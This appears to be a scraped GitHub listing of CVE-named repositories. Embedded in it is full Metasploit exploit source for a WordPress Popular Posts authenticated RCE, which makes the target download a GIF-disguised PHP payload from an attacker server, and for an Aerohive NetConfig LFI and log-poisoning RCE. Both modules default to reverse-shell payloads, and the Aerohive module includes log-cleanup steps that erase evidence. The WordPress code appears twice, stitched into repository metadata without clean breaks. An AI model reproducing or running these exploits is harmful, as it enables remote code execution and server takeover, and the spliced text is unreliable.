value="(?<ajax_nonce>[^"])/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "(?<wp_nonce>[^"])/ =~ res.body /},"post":{"id":(?<post_id>\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?<custom_nonce>[^"])/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "\n
#{Rex::Text.rand_text_alphanumeric(100..200)}
\n", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? "<tr id='meta-" end def boost_post(cookie, post_id, wp_nonce, post_count) # redirect as needed res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com// (1..post_count).each do |c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { 'wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?\d+) views</ =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do || @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?<widget_id>\d+)/ =~ @res.body # load the widget directly (1..10).each do || @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => "/#{payload_name}" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.") # end # at this point, we rely on our web server getting requests to make the rest happen endend### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE', 'Description' => %q{ This module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user. NetConfig is the Aerohive/Extreme Networks HiveOS administrative webinterface. Vulnerable versions allow for LFI because they rely on a version of PHP 5 that is vulnerable to string truncation attacks. This module leverages this issue in conjunction with log poisoning to gain RCE as root. Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open. Closing the session should render the app responsive again. The module provides an automatic cleanup option to clean the log. However, this option is disabled by default because any modifications to the /tmp/messages log, even via sed, may render the target (temporarily) unexploitable. This state can last over an hour. This module has been successfully tested against Aerohive NetConfig versions 8.2r4 and 10.0r7a. }, 'License' => MSF_LICENSE, 'Author' => [ 'Erik de Jong', # github.com/eriknl - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-16152'], # still categorized as RESERVED ['URL', 'https://github.com/eriknl/CVE-2020-16152'] # analysis and PoC code ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Platform' => %w[linux unix], 'Arch' => [ ARCH_ARMLE, ARCH_CMD ], 'Targets' => [ [ 'Linux', { 'Arch' => [ARCH_ARMLE], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' } } ], [ 'CMD', { 'Arch' => [ARCH_CMD], 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' # this may be the only payload that works for this target' } } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-02-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '/']), OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the /tmp/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]), ] end def auto_clean_log datastore['AUTO_CLEAN_LOG'] end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php5') }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('Aerohive NetConfig UI') return CheckCode::Safe('Target is not an Aerohive NetConfig application.') end version = res.body.scan(/action="login.php5?version=(.?)"/)&.flatten&.first unless version return CheckCode::Detected('Could not determine Aerohive NetConfig version.') end begin if Rex::Version.new(version) <= Rex::Version.new('10.0r8a') return CheckCode::Appears("The target is Aerohive NetConfig version #{version}") else print_warning('It should be noted that it is unclear if/when this issue was patched, so versions after 10.0r8a may still be vulnerable.') return CheckCode::Safe("The target is Aerohive NetConfig version #{version}") end rescue StandardError => e return CheckCode::Unknown("Failed to obtain a valid Aerohive NetConfig version: #{e}") end end def poison_log password = rand_text_alphanumeric(8..12) @shell_cmd_name = rand_text_alphanumeric(3..6) @poison_cmd = "" # Poison /tmp/messages print_status('Attempting to poison the log at /tmp/messages...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login.php5'), 'vars_post' => { 'login_auth' => 0, 'miniHiveUI' => 1, 'authselect' => 'Name/Password', 'userName' => @poison_cmd, 'password' => password } }) unless res fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at /tmp/messages') end unless res.code == 200 && res.body.include?('cmn/redirectLogin.php5?ERROR_TYPE=MQ==') fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at /tmp/messages') end print_status('Server responded as expected. Continuing...') end def on_new_session(session) log_cleaned = false if auto_clean_log print_status('Attempting to clean the log file at /tmp/messages...') print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.') begin # We need remove the line containing the PHP system call from /tmp/messages # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username. # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite /tmp/messages with it, is the same: # In both cases the app will likely stop writing to /tmp/messages for quite a while (could be over an hour), rendering the target unexploitable during that period. line_to_delete_file = "/tmp/#{rand_text_alphanumeric(5..10)}" clean_messages_file = "/tmp/#{rand_text_alphanumeric(5..10)}" cmds_to_clean_log = "grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system' > #{line_to_delete_file}; "\ "grep -vFf #{line_to_delete_file} /tmp/messages > #{clean_messages_file}; mv #{clean_messages_file} /tmp/messages; rm -f #{line_to_delete_file}" if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute('/bin/sh', "-c "#{cmds_to_clean_log}"") # Wait for cleanup Rex.sleep 5 # Check for the PHP system call in /tmp/messages messages_contents = session.fs.file.open('/tmp/messages').read.to_s # using =~ here produced unexpected results, so include? is used instead unless messages_contents.include?(@poison_cmd) log_cleaned = true end elsif session.type.to_s.eql?('shell') session.shell_command_token(cmds_to_clean_log.to_s) # Check for the PHP system call in /tmp/messages poison_evidence = session.shell_command_token("grep #{@shell_cmd_name} /tmp/messages | grep POST | grep 'php system'") # using =~ here produced unexpected results, so include? is used instead unless poison_evidence.include?(@poison_cmd) log_cleaned = true end end rescue StandardError => e print_error("Error during cleanup: #{e.message}") ensure super end unless log_cleaned print_warning("Could not replace the PHP system call '#{@poison_cmd}' in /tmp/messages") end end if log_cleaned print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from /tmp/messages.') else print_warning("Erasing the log poisoning evidence will require manually editing/removing the line in /tmp/messages that contains the poison command:\n\t#{@poison_cmd}") print_warning('Please note that any modifications to /tmp/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.') print_warning('Deleting /tmp/messages or clearing out the file may break the application.') end end def execute_command(cmd, _opts = {}) print_status('Attempting to execute the payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'action.php5'), 'vars_get' => { '_action' => 'list', 'debug' => 'true' }, 'vars_post' => { '_page' => rand_text_alphanumeric(1) + '/..' * 8 + '/' * 4041 + '/tmp/messages', # Trigger LFI through path truncation @shell_cmd_name => cmd } }, 0) print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.') end def exploit poison_log if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end endend : Nate0634034090/nate158g-m-w-n-l-p-d-a-o-e create time: 2022-01-02T08:08:00Zno description : darkpills/CVE-2021-24307-all-in-one-seo-pack-admin-rce create time: 2022-01-02T07:50:09Z
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192/172/127/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2542638' ], [ 'URL', 'https://github.com/cabrerahector/wordpress-popular-posts/commit/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192/10/127/172)', '']), # https://github.com/WordPress/wordpress-develop/blob/5.8/src/wp-includes/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status("Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https://stackoverflow.com/questions/3854842/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image/gif', 'Content-Length' => "GIF#{payload.encoded}".length.to_s }) end if request.method == 'GET' on_disk_payload_name = "#{post_id}_#{payload_name}" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, "GIF#{payload.encoded}", 'Content-Type' => 'image/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status("Received unexpected #{request.method} request") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="([^"])/ =~ res.body Regexp.last_match(1) end def change_settings(cookie, token) vprint_status('Updating popular posts settings for images') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save/change settings') unless /Settings saved/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => "#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit", 'action' => 'toggle-custom-fields' } ) /name="_ajax_nonce-add-meta" value="([^"])/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 /name="_ajax_nonce-add-meta" value="(?<ajax_nonce>[^"])/ =~ res.body /wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "(?<wp_nonce>[^"])/ =~ res.body /},"post":{"id":(?<post_id>\d*)/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https://www.hostpapa.com/knowledgebase/add-custom-meta-boxes-wordpress-posts/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') /name="toggle-custom-fields-nonce" value="(?<custom_nonce>[^"]*)/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status("ajax nonce: #{ajax_nonce}") end unless wp_nonce.nil? vprint_status("wp nonce: #{wp_nonce}") end unless post_id.nil? vprint_status("Created Post: #{post_id}") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status("Writing content to Post: #{post_id}") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application/json', 'accept' => 'application/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => "\n
#{Rex::Text.rand_text_alphanumeric(100..200)}
\n", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '"status":"publish"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = "http://#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}/#{payload_name}" vprint_status("Adding malicious metadata for redirect to #{payload_url}") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? "<tr id='meta-" end def boost_post(cookie, post_id, wp_nonce, post_count) # redirect as needed res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status("Sending #{post_count} views to #{res.headers['Location']}") location = res.headers['Location'].split('/')[3...-1].join('/') # http://example.com// (1..post_count).each do |c| res = send_request_cgi!( 'uri' => "/#{location}", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { 'wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget />(?\d+) views</ =~ res.body views = views.to_i print_status("Top Views: #{views}") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status("Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do || @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 /data-widget-id="wpp-(?<widget_id>\d+)/ =~ @res.body # load the widget directly (1..10).each do || @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = "#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php" vprint_status("Payload file name: #{payload_name}") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status("wpp_admin_token: #{token}") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => "/#{payload_name}" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, "Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.") # end # at this point, we rely on our web server getting requests to make the rest happen end end : Nate0634034090/-nate158.res.codeRex.sleepsession.type.to_s.eql-shell- create time: 2022-01-02T07:48:47Zno description : sdogancesur/CVE-2021-44228-github-repository create time: 2022-01-01T21:36:40Z
Log4j-Scanner : marklindsey11/gh-repo-clone-marklindsey11--CVE-2021-44228_scanner-Applications-that-are-vulnerable-to-the-log4j-CV create time: 2022-01-01T20:01:01Z
The vulnerability affects Apache APISIX Dashboard version 2.10.1 : itxfahdi/-cve-2021-45232 create time: 2022-01-01T19:31:13Z
no description : marklindsey11/-CVE-2021-44228_scanner-Applications-that-are-vulnerable-to-the-log4j-CVE-2021-44228-https-nvd. create time: 2022-01-01T15:13:22Z
no description : Edgarloyola/CVE-2021-40904 create time: 2021-10-12T09:38:48Z
no description : Edgarloyola/CVE-2021-40905 create time: 2021-10-12T09:36:56Z
no description : Edgarloyola/CVE-2021-40906 create time: 2021-10-12T09:30:38Z
This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, known as Log4Shell. : romanutti/log4shell-vulnerable-app create time: 2021-12-31T20:39:44Z
Test application for CVE-2018-1285 alert for Solarwinds DLLs : alex-ermolaev/Log4NetSolarWindsSNMP- create time: 2021-12-31T18:21:32Z
no description : Rinkal26/cve-2018-8014 create time: 2021-12-31T16:49:56Z
no description : secureITmania/2021-cve-animes create time: 2021-12-31T17:14:03Z
CVE-2021-44832 : DanielRuf/CVE-2021-44832 create time: 2021-12-30T20:24:07Z
no description : morhax/cve-2021-45232-rce create time: 2021-12-30T19:59:54Z
